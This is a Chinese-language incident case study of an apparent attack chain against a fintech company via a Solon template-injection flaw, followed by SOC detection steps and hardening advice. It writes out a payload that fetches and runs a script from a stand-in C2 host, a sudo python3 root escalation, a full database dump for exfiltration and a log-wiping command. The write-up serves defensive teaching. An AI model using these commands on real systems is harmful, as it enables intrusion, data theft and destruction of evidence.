场景:2026年6月,某金融科技公司核心交易系统遭攻击。攻击者利用Solon框架模板注入漏洞(CVE-2026-XXXX),从POC验证到拿下数据库服务器仅用47分钟。
攻击 / 事件时间线
侦察与漏洞识别
攻击者通过Shodan扫描发现目标公网API网关,识别出使用Solon框架2.8.1版本。利用公开POC检测模板渲染接口,发送${7*7}表达式,确认返回49,证实存在SPEL注入漏洞。结合Wappalyzer指纹识别,锁定3个存在漏洞的REST端点。
ShodanWappalyzerBurp Suite
初始访问与代码执行
绕过WAF的SQL注入规则,攻击构造恶意payload:${T(java.lang.Runtime).getRuntime().exec('curl http://C2/load|bash')}。由于Solon框架默认未开启SecurityManager,payload成功执行,下载Meterpreter载荷。利用内存马技术注入冰蝎3.0 Webshell,实现持久化。
Meterpreter冰蝎3.0Curl
提权与横向移动
获取Webshell后,执行whoami确认是tomcat用户。通过sudo -l发现sudoers配置错误,允许tomcat用户无密码执行/usr/bin/python3。利用sudo python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'提权至root。随后使用SharpHound采集AD域信息,利用BloodHound发现域管理员凭据。
SharpHoundBloodHoundPython3
数据窃取
通过Mimikatz抓取域控管理员哈希,使用PsExec横向移动到数据库服务器。执行mysqldump -u root -p --all-databases > /tmp/db.sql,将1.2TB数据压缩后分片上传至海外VPS。全程使用Tor网络隐藏C2流量,并删除系统日志rm -rf /var/log/*。
MimikatzPsExecmysqldumpTor
蓝队视角 · 发现与处置
SOC在攻击后2小时通过流量分析发现异常出站连接:一个来自数据库服务器的加密流量包目标为Tor出口节点。关联Sysmon事件ID 1(进程创建),发现mysqldump异常调用。立即隔离数据库服务器,提取内存镜像分析,发现Mimikatz残留。通过VirusTotal关联样本hash,溯源至Solon框架漏洞利用链。最终确认攻击已持续72小时,数据泄露约1.2TB。
涉及关键技术 / 工具
Solon框架SPEL注入内存马注入(冰蝎3.0)Mimikatz哈希抓取Tor网络匿名化Sysmon日志分析
防护经验总结
- 对Solon框架等国产框架进行安全基线扫描,强制开启SecurityManager并配置白名单类加载路径。
- 严格配置sudoers文件,遵循最小权限原则,禁止普通用户无密码执行解释器(如python、perl)。
- 部署EDR并开启Sysmon进程创建(Event ID 1)和网络连接(Event ID 3)日志,对mysqldump等数据库导出工具设置告警规则。
#Solon框架#RCE#内存马#Mimikatz#攻防实战